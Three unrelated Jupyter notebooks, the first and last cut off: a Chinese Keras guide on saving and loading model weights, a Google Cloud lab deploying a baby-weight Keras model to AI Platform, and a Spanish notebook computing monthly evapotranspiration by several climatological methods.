x = keras.layers.Dropout(0.5)(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model_with_dropout = keras.Model(
inputs=inputs, outputs=outputs, name="3_layer_mlp"
)
functional_model_with_dropout.set_weights(functional_model.get_weights())
```
### 用于将权重保存到磁盘并将其加载回来的 API
可以用以下格式调用 `model.save_weights`,将权重保存到磁盘:
- TensorFlow 检查点
- HDF5
`model.save_weights` 的默认格式是 TensorFlow 检查点。可以通过以下两种方法来指定保存格式:
1. `save_format` 参数:将值设置为 `save_format="tf"` 或 `save_format="h5"`。
2. `path` 参数:如果路径以 `.h5` 或 `.hdf5` 结束,则使用 HDF5 格式。除非设置了 `save_format`,否则对于其他后缀,将使用 TensorFlow 检查点格式。
您还可以选择将权重作为内存中的 Numpy 数组取回。每个 API 都有自己的优缺点,详情如下。
### TF 检查点格式
**示例:**
```
# Runnable example
sequential_model = keras.Sequential(
[
keras.Input(shape=(784,), name="digits"),
keras.layers.Dense(64, activation="relu", name="dense_1"),
keras.layers.Dense(64, activation="relu", name="dense_2"),
keras.layers.Dense(10, name="predictions"),
]
)
sequential_model.save_weights("ckpt")
load_status = sequential_model.load_weights("ckpt")
# `assert_consumed` can be used as validation that all variable values have been
# restored from the checkpoint. See `tf.train.Checkpoint.restore` for other
# methods in the Status object.
load_status.assert_consumed()
```
#### 格式详情
TensorFlow 检查点格式使用对象特性名称来保存和恢复权重。以 `tf.keras.layers.Dense` 层为例。该层包含两个权重:`dense.kernel` 和 `dense.bias`。将层保存为 `tf` 格式后,生成的检查点会包含 `"kernel"` 和 `"bias"` 键及其对应的权重值。有关详细信息,请参阅 [TF 检查点指南中的“加载机制”](https://tensorflow.google.cn/guide/checkpoint#loading_mechanics)。
请注意,特性/计算图边缘根据**父对象中使用的名称而非变量的名称**进行命名。请考虑下面示例中的 `CustomLayer`。变量 `CustomLayer.var` 是将 `"var"` 而非 `"var_a"` 作为键的一部分来保存的。
```
class CustomLayer(keras.layers.Layer):
def __init__(self, a):
self.var = tf.Variable(a, name="var_a")
layer = CustomLayer(5)
layer_ckpt = tf.train.Checkpoint(layer=layer).save("custom_layer")
ckpt_reader = tf.train.load_checkpoint(layer_ckpt)
ckpt_reader.get_variable_to_dtype_map()
```
#### 迁移学习示例
本质上,只要两个模型具有相同的架构,它们就可以共享同一个检查点。
**示例:**
```
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
# Extract a portion of the functional model defined in the Setup section.
# The following lines produce a new model that excludes the final output
# layer of the functional model.
pretrained = keras.Model(
functional_model.inputs, functional_model.layers[-1].input, name="pretrained_model"
)
# Randomly assign "trained" weights.
for w in pretrained.weights:
w.assign(tf.random.normal(w.shape))
pretrained.save_weights("pretrained_ckpt")
pretrained.summary()
# Assume this is a separate program where only 'pretrained_ckpt' exists.
# Create a new functional model with a different output dimension.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(5, name="predictions")(x)
model = keras.Model(inputs=inputs, outputs=outputs, name="new_model")
# Load the weights from pretrained_ckpt into model.
model.load_weights("pretrained_ckpt")
# Check that all of the pretrained weights have been loaded.
for a, b in zip(pretrained.weights, model.weights):
np.testing.assert_allclose(a.numpy(), b.numpy())
print("\n", "-" * 50)
model.summary()
# Example 2: Sequential model
# Recreate the pretrained model, and load the saved weights.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
pretrained_model = keras.Model(inputs=inputs, outputs=x, name="pretrained")
# Sequential example:
model = keras.Sequential([pretrained_model, keras.layers.Dense(5, name="predictions")])
model.summary()
pretrained_model.load_weights("pretrained_ckpt")
# Warning! Calling `model.load_weights('pretrained_ckpt')` won't throw an error,
# but will *not* work as expected. If you inspect the weights, you'll see that
# none of the weights will have loaded. `pretrained_model.load_weights()` is the
# correct method to call.
```
通常建议使用相同的 API 来构建模型。如果您在序贯模型和函数式模型之间,或在函数式模型和子类化模型等之间进行切换,请始终重新构建预训练模型并将预训练权重加载到该模型。
下一个问题是,如果模型架构截然不同,如何保存权重并将其加载到不同模型?解决方案是使用 `tf.train.Checkpoint` 来保存和恢复确切的层/变量。
**示例:**
```
# Create a subclassed model that essentially uses functional_model's first
# and last layers.
# First, save the weights of functional_model's first and last dense layers.
first_dense = functional_model.layers[1]
last_dense = functional_model.layers[-1]
ckpt_path = tf.train.Checkpoint(
dense=first_dense, kernel=last_dense.kernel, bias=last_dense.bias
).save("ckpt")
# Define the subclassed model.
class ContrivedModel(keras.Model):
def __init__(self):
super(ContrivedModel, self).__init__()
self.first_dense = keras.layers.Dense(64)
self.kernel = self.add_variable("kernel", shape=(64, 10))
self.bias = self.add_variable("bias", shape=(10,))
def call(self, inputs):
x = self.first_dense(inputs)
return tf.matmul(x, self.kernel) + self.bias
model = ContrivedModel()
# Call model on inputs to create the variables of the dense layer.
_ = model(tf.ones((1, 784)))
# Create a Checkpoint with the same structure as before, and load the weights.
tf.train.Checkpoint(
dense=model.first_dense, kernel=model.kernel, bias=model.bias
).restore(ckpt_path).assert_consumed()
```
### HDF5 格式
HDF5 格式包含按层名称分组的权重。权重是通过将可训练权重列表与不可训练权重列表连接起来进行排序的列表(与 `layer.weights` 相同)。因此,如果模型的层和可训练状态与保存在检查点中的相同,则可以使用 HDF5 检查点。
**示例:**
```
# Runnable example
sequential_model = keras.Sequential(
[
keras.Input(shape=(784,), name="digits"),
keras.layers.Dense(64, activation="relu", name="dense_1"),
keras.layers.Dense(64, activation="relu", name="dense_2"),
keras.layers.Dense(10, name="predictions"),
]
)
sequential_model.save_weights("weights.h5")
sequential_model.load_weights("weights.h5")
```
请注意,当模型包含嵌套层时,更改 `layer.trainable` 可能导致 `layer.weights` 的顺序不同。
```
class NestedDenseLayer(keras.layers.Layer):
def __init__(self, units, name=None):
super(NestedDenseLayer, self).__init__(name=name)
self.dense_1 = keras.layers.Dense(units, name="dense_1")
self.dense_2 = keras.layers.Dense(units, name="dense_2")
def call(self, inputs):
return self.dense_2(self.dense_1(inputs))
nested_model = keras.Sequential([keras.Input((784,)), NestedDenseLayer(10, "nested")])
variable_names = [v.name for v in nested_model.weights]
print("variables: {}".format(variable_names))
print("\nChanging trainable status of one of the nested layers...")
nested_model.get_layer("nested").dense_1.trainable = False
variable_names_2 = [v.name for v in nested_model.weights]
print("\nvariables: {}".format(variable_names_2))
print("variable ordering changed:", variable_names != variable_names_2)
```
#### 迁移学习示例
从 HDF5 加载预训练权重时,建议将权重加载到设置了检查点的原始模型中,然后将所需的权重/层提取到新模型中。
**示例:**
```
def create_functional_model():
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
return keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
functional_model = create_functional_model()
functional_model.save_weights("pretrained_weights.h5")
# In a separate program:
pretrained_model = create_functional_model()
pretrained_model.load_weights("pretrained_weights.h5")
# Create a new model by extracting layers from the original model:
extracted_layers = pretrained_model.layers[:-1]
extracted_layers.append(keras.layers.Dense(5, name="dense_3"))
model = keras.Sequential(extracted_layers)
model.summary()
```
| github_jupyter |
# LAB 5b: Deploy and predict with Keras model on Cloud AI Platform.
**Learning Objectives**
1. Setup up the environment
1. Deploy trained Keras model to Cloud AI Platform
1. Online predict from model on Cloud AI Platform
1. Batch predict from model on Cloud AI Platform
## Introduction
In this notebook, we'll deploying our Keras model to Cloud AI Platform and creating predictions.
We will set up the environment, deploy a trained Keras model to Cloud AI Platform, online predict from deployed model on Cloud AI Platform, and batch predict from deployed model on Cloud AI Platform.
Each learning objective will correspond to a __#TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/5b_deploy_keras_ai_platform_babyweight.ipynb).
## Set up environment variables and load necessary libraries
Import necessary libraries.
```
import os
```
### Lab Task #1: Set environment variables.
Set environment variables so that we can use them throughout the entire lab. We will be using our project name for our bucket, so you only need to change your project and region.
```
%%bash
PROJECT=$(gcloud config list project --format "value(core.project)")
echo "Your current GCP Project Name is: "$PROJECT
# Change these to try this notebook out
PROJECT = "cloud-training-demos" # TODO: Replace with your PROJECT
BUCKET = PROJECT # defaults to PROJECT
REGION = "us-central1" # TODO: Replace with your REGION
os.environ["BUCKET"] = BUCKET
os.environ["REGION"] = REGION
os.environ["TFVERSION"] = "2.1"
%%bash
gcloud config set compute/region $REGION
gcloud config set ai_platform/region global
```
## Check our trained model files
Let's check the directory structure of our outputs of our trained model in folder we exported the model to in our last [lab](../solutions/5a_train_keras_ai_platform_babyweight.ipynb). We'll want to deploy the saved_model.pb within the timestamped directory as well as the variable values in the variables folder. Therefore, we need the path of the timestamped directory so that everything within it can be found by Cloud AI Platform's model deployment service.
```
!gsutil cp -r ../babyweight gs://<bucket-name> # TODO: Replace with your bucket-name
%%bash
gsutil ls gs://${BUCKET}/babyweight/trained_model
%%bash
MODEL_LOCATION=$(gsutil ls -ld -- gs://${BUCKET}/babyweight/trained_model/2* \
| tail -1)
gsutil ls ${MODEL_LOCATION}
```
## Lab Task #2: Deploy trained model.
Deploying the trained model to act as a REST web service is a simple gcloud call. Complete __#TODO__ by providing location of saved_model.pb file to Cloud AI Platoform model deployment service. The deployment will take a few minutes.
```
%%bash
MODEL_NAME="babyweight"
MODEL_VERSION="ml_on_gcp"
MODEL_LOCATION=# TODO: Add GCS path to saved_model.pb file.
echo "Deleting and deploying $MODEL_NAME $MODEL_VERSION from $MODEL_LOCATION"
# gcloud ai-platform versions delete ${MODEL_VERSION} --model ${MODEL_NAME}
# gcloud ai-platform models delete ${MODEL_NAME}
gcloud ai-platform models create ${MODEL_NAME} --regions ${REGION}
gcloud ai-platform versions create ${MODEL_VERSION} \
--model=${MODEL_NAME} \
--origin=${MODEL_LOCATION} \
--runtime-version=2.1 \
--python-version=3.7
```
## Lab Task #3: Use model to make online prediction.
Complete __#TODO__s for both the Python and gcloud Shell API methods of calling our deployed model on Cloud AI Platform for online prediction.
### Python API
We can use the Python API to send a JSON request to the endpoint of the service to make it predict a baby's weight. The order of the responses are the order of the instances.
```
from oauth2client.client import GoogleCredentials
import requests
import json
MODEL_NAME = # TODO: Add model name
MODEL_VERSION = # TODO: Add model version
token = GoogleCredentials.get_application_default().get_access_token().access_token
api = "https://ml.googleapis.com/v1/projects/{}/models/{}/versions/{}:predict" \
.format(PROJECT, MODEL_NAME, MODEL_VERSION)
headers = {"Authorization": "Bearer " + token }
data = {
"instances": [
{
"is_male": "True",
"mother_age": 26.0,
"plurality": "Single(1)",
"gestation_weeks": 39
},
{
"is_male": "False",
"mother_age": 29.0,
"plurality": "Single(1)",
"gestation_weeks": 38
},
{
"is_male": "True",
"mother_age": 26.0,
"plurality": "Triplets(3)",
"gestation_weeks": 39
},
# TODO: Create another instance
]
}
response = requests.post(api, json=data, headers=headers)
print(response.content)
```
The predictions for the four instances were: 5.33, 6.09, 2.50, and 5.86 pounds respectively when I ran it (your results might be different).
### gcloud shell API
Instead we could use the gcloud shell API. Create a newline delimited JSON file with one instance per line and submit using gcloud.
```
%%writefile inputs.json
{"is_male": "True", "mother_age": 26.0, "plurality": "Single(1)", "gestation_weeks": 39}
{"is_male": "False", "mother_age": 26.0, "plurality": "Single(1)", "gestation_weeks": 39}
```
Now call `gcloud ai-platform predict` using the JSON we just created and point to our deployed `model` and `version`.
```
%%bash
gcloud ai-platform predict \
--model=babyweight \
--json-instances=inputs.json \
--version=# TODO: Add model version
```
## Lab Task #4: Use model to make batch prediction.
Batch prediction is commonly used when you have thousands to millions of predictions. It will create an actual Cloud AI Platform job for prediction. Complete __#TODO__s so we can call our deployed model on Cloud AI Platform for batch prediction.
__NOTE:__ If you get any internal error after running the job, Please wait for a few minutes and re-run the below cell.
```
%%bash
INPUT=gs://${BUCKET}/babyweight/batchpred/inputs.json
OUTPUT=gs://${BUCKET}/babyweight/batchpred/outputs
gsutil cp inputs.json $INPUT
gsutil -m rm -rf $OUTPUT
gcloud ai-platform jobs submit prediction babypred_$(date -u +%y%m%d_%H%M%S) \
--data-format=TEXT \
--region ${REGION} \
--input-paths=$INPUT \
--output-path=$OUTPUT \
--model=babyweight \
--version=# TODO: Add model version
```
## Lab Summary:
In this lab, we set up the environment, deployed a trained Keras model to Cloud AI Platform, online predicted from deployed model on Cloud AI Platform, and batch predicted from deployed model on Cloud AI Platform.
Copyright 2022 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License
| github_jupyter |
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#%matplotlib inline
# Leer la data
direccion = '.\\data\\data.xlsx'
# humedad relativa
df_humedad_relativa = pd.read_excel(direccion, sheet_name='Hoja1')
# Velocidad del viento
df_velocidad_del_viento = pd.read_excel(direccion, sheet_name='Hoja2')
# Temperatura maxima
df_temperatura_maxima = pd.read_excel(direccion, sheet_name='Hoja3')
# Temperatura minima
df_temperatura_minima = pd.read_excel(direccion, sheet_name='Hoja4')
#la tabla tiene los valores iniciales para interpolar y calcular valores
df_datos_iniciales = pd.read_excel(direccion, sheet_name='Hoja5')
# nombramos los caracteres que denoten un valor faltante
valor_faltante = '****'
#constantes
latitud = 18.4902777777778 #latitud
z=5 #altura de medicion sobre la superficie (m)
elevacion=2011 #Elevacionde la zona
# modificamos el nombre de las columnas para tener homogeneidad
nombre_columnas = ['AŃO', 'ENE', 'FEB', 'MAR', 'ABR',
'MAY', 'JUN', 'JUL', 'AGO', 'SEP', 'OCT', 'NOV', 'DIC', 'ANUAL']
df_humedad_relativa .columns = nombre_columnas
df_velocidad_del_viento.columns = nombre_columnas
df_temperatura_maxima.columns = nombre_columnas
df_temperatura_minima.columns = nombre_columnas
# visualizacion de datos iniciales sin corregir de la humedad relativa
df_humedad_relativa .head(5)
# visualizacion de datos iniciales sin corregir de la Valocidad del viento
df_velocidad_del_viento.head(5)
#visualizacion de datos de la temperatura maxima
df_temperatura_maxima.head(5)
#visualizacion de datos de la temperatura minima
df_temperatura_minima.head(5)
# El siguiente codigo corrige los datos, convirtiendolo en numericos decimales y remplazando los valores faltantes con la mediana
def correccionDeDatos(nombre_df, valor_faltante):
df = pd.DataFrame(nombre_df, columns=list(nombre_df))
# Conversion de los datos a valor numerico
for i in nombre_columnas:
df[i] = df[i].replace(valor_faltante, np.nan)
df[i] = pd.to_numeric(df[i], downcast='float')
# sustitucion de valores faltanres por la mediana
mediana = df[i].median()
df[i] = df[i].replace(np.nan, mediana)
return df
df_humedad_relativa = correccionDeDatos(df_humedad_relativa, valor_faltante)
# numero de datos
cantidad_de_datos_humedad = df_humedad_relativa.shape[0]
# tabla corregida
df_humedad_relativa
df_velocidad_del_viento = correccionDeDatos(df_velocidad_del_viento, valor_faltante)
# numero de datos
cantidad_de_datos_vel_viento = df_velocidad_del_viento.shape[0]
# tabla corregida
df_velocidad_del_viento
#Conversion de km/hr a m/s
valores_anuales_de_vel = df_velocidad_del_viento['AŃO']
df_velocidad_del_viento_ms = df_velocidad_del_viento*1000/3600
df_velocidad_del_viento_ms['AŃO']=df_velocidad_del_viento['AŃO']
df_velocidad_del_viento_ms
df_temperatura_maxima = correccionDeDatos(df_temperatura_maxima, valor_faltante)
# numero de datos
cantidad_de_datos_temperatura_max = df_temperatura_maxima.shape[0]
# tabla corregida
df_temperatura_maxima
df_temperatura_minima = correccionDeDatos(df_temperatura_minima, valor_faltante)
# numero de datos
cantidad_de_datos_temperatura_min = df_temperatura_minima.shape[0]
# tabla corregida
df_temperatura_minima
df_temperatura_media=(df_temperatura_maxima+df_temperatura_minima)/2
# tabla corregida
df_temperatura_media
nombre_columnas_evot = ['MES', 'LATITUD SUPERIOR', 'LATITUD INFERIOR', 'RADIACION EXTRATERRESTRE SUP', 'RADIACION EXTRATERRESTRE INF', 'INSOLACION MAXIMA DIARIA SUP',
'INSOLACION MAXIMA DIARIA INF', 'PORCENTAJE BANDA DE COBRTURA DE NUBES']
df_datos_iniciales.columns = nombre_columnas_evot
#la tabla contara con los siguientes datos
#radiacion extraterrestre (Ra)
#insolacion maxima diaria (Na)
#porcentaje
df_datos_iniciales
df_datos_iniciales
#el siguiente codigo se encarga de interpolar valores
def interpolacionColumnas(x0,x1,y0,y1,x):
x_cal = round(y0-(x0-x)*(y1-y0)/(x1-x0),3)
return x_cal
#valores para la interpolacion
x0=df_datos_iniciales['LATITUD INFERIOR']
x1=df_datos_iniciales['LATITUD SUPERIOR']
y0_R=df_datos_iniciales['RADIACION EXTRATERRESTRE INF']
y1_R=df_datos_iniciales['RADIACION EXTRATERRESTRE SUP']
y0_I=df_datos_iniciales['INSOLACION MAXIMA DIARIA INF']
y1_I=df_datos_iniciales['INSOLACION MAXIMA DIARIA SUP']
x=latitud
#a acontinuacion se calcula los valores de radiacion e insolacion maxima para nuestro caso
col_radiacion=interpolacionColumnas(x0,x1,y0_R,y1_R,x)
col_insolacion=interpolacionColumnas(x0,x1,y0_I,y1_I,x)
#A continuacion calculamos duracion de la insolacion para la ubicacion en especifica
col_dur_insolacion = col_insolacion*df_datos_iniciales['PORCENTAJE BANDA DE COBRTURA DE NUBES']/100
#creamos una nueva tabla
meses=df_datos_iniciales['MES']
#nombre columnas
nombre_tabla_final = ['MES','RADIACION EXTRATERRESTRE (RA)','INSOLACION MAXIMA DIARIA (N hrs)','DURACION DE LA INSOLACION (hrs)']
valores= list(zip(meses,col_radiacion,col_insolacion,col_dur_insolacion))
df_datos=pd.DataFrame(valores,columns=nombre_tabla_final)
#anadimos el ascendente
df_datos
# calculamos la velocidad promedio del viento
velocidad_Del_viento_promedio = list(df_velocidad_del_viento_ms.mean())
velocidad_Del_viento_promedio.pop(13)
velocidad_Del_viento_promedio.pop(0)
# calculamos la velocidad promedio del viento
humedad_relativa_promedio = list(df_humedad_relativa.mean())
humedad_relativa_promedio.pop(13)
humedad_relativa_promedio.pop(0)
# temperatura maxima promedio
temperatura_maxima = list(df_temperatura_maxima.mean())
temperatura_maxima.pop(13)
temperatura_maxima.pop(0)
# temperatura minima promedio
temperatura_minima = list(df_temperatura_minima.mean())
temperatura_minima.pop(13)
temperatura_minima.pop(0)
# calculamos la TEMPERATURA PROMEDIO
temperatura_promedio = list(df_temperatura_media.mean())
temperatura_promedio.pop(13)
temperatura_promedio.pop(0)
# creamos una nueva tabla
# nombre columnas
nombre_tabla_calculos = ['MES', 'HUMEDAD RELATIVA',
'VELOCIDAD DEL VIENTO (m/s)', 'TEMPERATURA MAXIMA (C)', 'TEMEPERATURA MINIMA (C)', 'TEMPERATURA MEDIA (C)']
valores = list(zip(meses, humedad_relativa_promedio, velocidad_Del_viento_promedio,
temperatura_maxima, temperatura_minima, temperatura_promedio))
df_calculos = pd.DataFrame(valores, columns=nombre_tabla_calculos)
#Calculos
#Calculo de la velocidad u2 (m/s)
df_calculos['u2 (m/s)']=df_calculos['VELOCIDAD DEL VIENTO (m/s)']*4.87/(np.log(67.8*z-5.42))
#CALCULO DE LA PRESION
p=round(101.3*((293-0.0065*elevacion)/293)**5.26,3)
#constante psicometrica kpa/c
const_ps=round(0.665*p*0.001,5)
df_calculos['PRESION']=p
df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']=const_ps
df_calculos['TEMPERATURA MEDIA (C)']=temperatura_promedio
df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']=4098*0.6108*np.exp((17.27*df_calculos['TEMPERATURA MEDIA (C)'])/(df_calculos['TEMPERATURA MEDIA (C)']+237.3))/(df_calculos['TEMPERATURA MEDIA (C)']+237.3)**2
#calculo del flujo del calor del suelo
gs_1=round(0.14*(df_calculos['TEMPERATURA MEDIA (C)'][0]-df_calculos['TEMPERATURA MEDIA (C)'][11]),5)
gs=[]
gs.append(gs_1)
for i in range(1,len(df_calculos['TEMPERATURA MEDIA (C)'])):
ti=df_calculos['TEMPERATURA MEDIA (C)'][i]
ti_1=df_calculos['TEMPERATURA MEDIA (C)'][i-1]
gs_cal=round(0.14*(ti-ti_1),5)
gs.append(gs_cal)
df_calculos['FLUJO DEL CALOR DEL SUELO (mj/m2/dia)']=gs
#DEFICIT DE PRESION DE VAPOR
df_calculos['DEFICIT DE PRESION DE VAPOR etmax (KPA)']=0.6108*np.exp((17.27*df_calculos['TEMPERATURA MAXIMA (C)'])/(df_calculos['TEMPERATURA MAXIMA (C)']+237.3))
df_calculos['DEFICIT DE PRESION DE VAPOR etmin (KPA)']=0.6108*np.exp((17.27*df_calculos['TEMEPERATURA MINIMA (C)'])/(df_calculos['TEMEPERATURA MINIMA (C)']+237.3))
df_calculos['PRESION VAPOR DE SATURACION (KPA)']=(df_calculos['DEFICIT DE PRESION DE VAPOR etmax (KPA)']+df_calculos['DEFICIT DE PRESION DE VAPOR etmin (KPA)'])/2
df_calculos['PRESION REAL DE VAPOR (KPA)']=df_calculos['HUMEDAD RELATIVA']*df_calculos['PRESION VAPOR DE SATURACION (KPA)']/100
#RADIACION NETA EN LA SUPERFICIE
#creamos una nueva tabla
df_RN=df_datos
#calculos
df_RN['Rs']=round((0.25+0.5*df_RN['DURACION DE LA INSOLACION (hrs)']/df_RN['INSOLACION MAXIMA DIARIA (N hrs)'])*df_RN['RADIACION EXTRATERRESTRE (RA)'],5)
df_RN['Rns']=round(0.77*df_RN['Rs'],5)
#radiacion de onda larga
df_RN['Tmax k4'] =(4.903*10**-9)*(273.16+df_calculos['TEMPERATURA MAXIMA (C)'])**4
df_RN['Tmin k4'] =(4.903*10**-9)*(273.16+df_calculos['TEMEPERATURA MINIMA (C)'])**4
df_RN['Rso'] =(0.75+2*elevacion/100000)*df_RN['RADIACION EXTRATERRESTRE (RA)']
df_RN['Rnl'] =((df_RN['Tmax k4']+df_RN['Tmin k4'])/2)*(1.35*df_RN['Rs']/df_RN['Rso']-0.35)*(0.34-0.14*(df_calculos['PRESION REAL DE VAPOR (KPA)'])**0.5)
df_RN['Rn'] = df_RN['Rns'] - df_RN['Rnl']
df_RN
#CALCULOS FINALES DE LA EVAPOTRANSPIRACION PROMEDIO DIARIA
df_calculos['RADIACION NETA EN LA SUPERFICIE (MJ/m2/DIA)'] = df_RN['Rn']
df_calculos['DIAS POR MES'] = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
df_calculos['EVAPOTRANSPIRACION PROMEDIO DIARIA'] = (0.408*df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']*(df_calculos['RADIACION NETA EN LA SUPERFICIE (MJ/m2/DIA)'] -
df_calculos['FLUJO DEL CALOR DEL SUELO (mj/m2/dia)'])+(df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']*900/(df_calculos['TEMPERATURA MEDIA (C)']+273))*df_calculos['u2 (m/s)']*(df_calculos['PRESION VAPOR DE SATURACION (KPA)']-df_calculos['PRESION REAL DE VAPOR (KPA)']))/(df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']+df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']*(1+0.34*df_calculos['u2 (m/s)']))
df_calculos['EVAPOTRANSPIRACION MENSUAL'] = df_calculos['EVAPOTRANSPIRACION PROMEDIO DIARIA'] * \
df_calculos['DIAS POR MES']
#TABLA FINAL DE RESULTADOS
df_calculos
# TABLA RESUMEN DE LA EVAPOTRANPIRACION
# creamos una nueva tabla donde se redondeara los resultados finales
# nombre columnas
evap_diaria = []
evap_mensual = []
for i in range(0, 12):
diaria = round(df_calculos['EVAPOTRANSPIRACION PROMEDIO DIARIA'][i], 3)
mensual = round(df_calculos['EVAPOTRANSPIRACION MENSUAL'][i], 3)
evap_diaria.append(diaria)
evap_mensual.append(mensual)
eto_mensual_fao =evap_mensual
nombre_tabla_RESUMEN = [
'MES', 'EVAPOTRANSPIRACION PROMEDIO DIARIA', 'EVAPOTRANSPIRACION PROMEDIO MENSUAL']
evapotranspiracion = list(zip(meses, evap_diaria, evap_mensual))
df_EVAP = pd.DataFrame(evapotranspiracion, columns=nombre_tabla_RESUMEN)
df_EVAP
#finalmente graficamos para ver el comportamiento de la evapotranspiracion en el transcurso del año
dias_acumulados = [31,59,90,120,151,181,212,243,273,304,334,365]
#Grafica
plt.plot( meses,evap_mensual, label="EVAPOTRANSPIRACION", ls='-')
#plt.axis(v)
plt.title(f'GRAFICA EVAPOTRANSPIRACION MENSUAL - VALLEGRANDE (AEROPUERTO)', color='#00008B')
plt.xlabel('Meses del año')
plt.ylabel(f'Evapotranspiracion mensual')
plt.grid(b=True, which='major', color='#666668', linestyle='--')
plt.legend(loc=4)
plt.show()
#METODO EVAPOTRANSPIRACION Makkink (Fontenot, 2004)
RS=df_RN['Rs']
PendSP = df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']
cont_piezo = df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']
dias =df_calculos['DIAS POR MES']
#creamos una nueva tabla
#nombre columnas
nombre_tabla_EM = ['MES','RADIACION SOLAR (mm/dia)','PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)','CONSTANTE PSICOMETRICA (Kpa/C)','Dias por mes']
valores= list(zip(meses,RS,PendSP,cont_piezo,dias))
df_evap_Makkink=pd.DataFrame(valores,columns=nombre_tabla_EM)
#anadimos el ascendente
df_evap_Makkink
#calculamos la evapotranspiracion por el metodo de makkink
eto_makkink=0.61*(PendSP /(PendSP +cont_piezo))*(RS/2.45)-0.12
eto_mensual_makkind=dias*eto_makkink
df_evap_Makkink ['Eto Diaria'] = eto_makkink
df_evap_Makkink ['Evapotranspiracion Mensual'] = eto_mensual_makkind
df_evap_Makkink
#METODO de Jansen Haise
Tm = df_calculos ['TEMPERATURA MEDIA (C)']
#calculamos la evapotranspiracion
RS =RS*0.408 # conversion a mm/dia
eto_jansen=RS*(0.025*Tm+0.08)
eto_mensual_jansen =dias*eto_jansen
#creamos la tabla
#nombre columnas
nombre_tabla_EJ = ['MES','RADIACION SOLAR (mm/dia)','Temperatura Media (C)','Dias por mes','Evapotranspiracion diaria','Evapotranspiracion Mensual']
valores= list(zip(meses,RS,Tm,dias,eto_jansen,eto_mensual_jansen))
df_evap_jasen=pd.DataFrame(valores,columns=nombre_tabla_EJ)
#visualizamos la tabla
df_evap_jasen
# evapotranspiracion metodo Priestley - Taylor
Rn = df_RN['Rn']*0.408 #conversion a mm/dia
G = df_calculos['FLUJO DEL CALOR DEL SUELO (mj/m2/dia)']
# calculamos la evapotranspiracion
eto_priestley = 1.26*(PendSP/(PendSP+cont_piezo))*(Rn-G)
eto_mensual_priestley = dias*eto_priestley
# creamos la tabla
# nombre columnas
nombre_tabla_Ept = ['MES', 'RADIACION NETA (mm/dia)', 'PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)', 'CONSTANTE PSICOMETRICA (Kpa/C)',
'FLUJO DEL CALOR DEL SUELO (mm/dia)','Dias por mes', 'Evapotranspiracion diaria', 'Evapotranspiracion Mensual']
valores = list(zip(meses, Rn, PendSP , cont_piezo, G, dias, eto_priestley, eto_mensual_priestley))
df_evap_priestley = pd.DataFrame(valores, columns=nombre_tabla_Ept)
# visualizamos la tabla
df_evap_priestley
# metodo de Turc
Tm
RS = df_RN['Rs']
RS = RS/(4.1868*10**-2) # convertimos Rs a (cal/cm2/dia)
# calculamos la evpotranspiracion diaria
eto_turc = 0.0133*(Tm/(Tm+15))*(RS+50)
eto_mensual_turc = eto_turc*dias
# creamos la tabla
# nombre columnas
nombre_tabla_Epturc = ['MES', 'RADIACION SOLAR (Cal/cm2/dia)', 'Temperarura media (C)', 'Dias por mes',
'Evapotranspiracion diaria (mm/dia)', 'Evapotranspiracion Mensual']
valores = list(zip(meses, RS, Tm, dias, eto_turc, eto_mensual_turc))
df_evap_turc = pd.DataFrame(valores, columns=nombre_tabla_Epturc)
# visualizamos la tabla
df_evap_turc
# METODO DE HARGREAVES
# Radiacion solar extraterrestre
Ra = df_RN['RADIACION EXTRATERRESTRE (RA)']*0.408
Tmax = np.array(temperatura_maxima)
Tmin = np.array(temperatura_minima)
# calculamos la evapotranspiracion
eto_hargreaves = 0.0023*Ra*(Tm+17.8)*(Tmax-Tmin)**0.5
eto_mensual_hargreaves = eto_hargreaves*dias
# creamos la tabla
# nombre columnas
nombre_tabla_EpHargreaves = ['MES', 'RADIACION SOLAR EXTRATERRESTRE (mm/dia)', 'Temperarura media (C)', 'Temperatura maxima (C)', 'Temperatura minima (C)', 'Dias por mes',
'Evapotranspiracion diaria', 'Evapotranspiracion Mensual']
valores = list(zip(meses, Ra, Tm, Tmax, Tmin, dias,
eto_hargreaves, eto_mensual_hargreaves))
df_evap_Hargreaves = pd.DataFrame(valores, columns=nombre_tabla_EpHargreaves)
# visualizamos la tabla
df_evap_Hargreaves
# Metodo de Thornthwaite
# empezamos calculando sus variables
Indice_termico_mensual = (Tm/5)**1.514
Indice_termico_anual = Indice_termico_mensual.sum()
a = ((675*10**(-9))*Indice_termico_anual**3-(771*10**(-7)) *
